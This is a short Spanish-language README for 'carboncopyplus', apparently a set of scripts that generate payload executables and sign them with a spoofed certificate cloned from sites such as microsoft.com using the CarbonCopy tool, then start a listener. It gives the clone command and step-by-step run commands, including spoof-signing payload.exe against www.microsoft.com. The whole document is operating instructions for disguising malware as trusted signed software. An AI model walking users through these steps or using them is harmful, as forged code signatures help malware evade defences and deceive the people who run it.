Estos Scripts contienen los codigos para generar los Payloads y poderlos firmar con el uso de la herramienta CarbonCopy creada por ParanoidNinja,
estos contienen las mejoras publicadas por Astr0baby y las correcciones realizadas por @jca6185


Probado en la version de KALI 2019.1

Pre-requisitos
   apt-get install mingw-w64 python-openssl osslsigncode 

Para descargar:
   git clone https://gitlab.com/jca6185/carboncopyplus.git 

Para ejecutar:
   cd carboncopyplus
   sh generator.sh
   python carboncopy.py www.microsoft.com 443 payload.exe payload2.exe
   osslsigncode verify payload2.exe
   sh listener.sh

Nota:  microsoft lo puedes reemplazar por otras como amazon, oracle, etc

By @jca6185

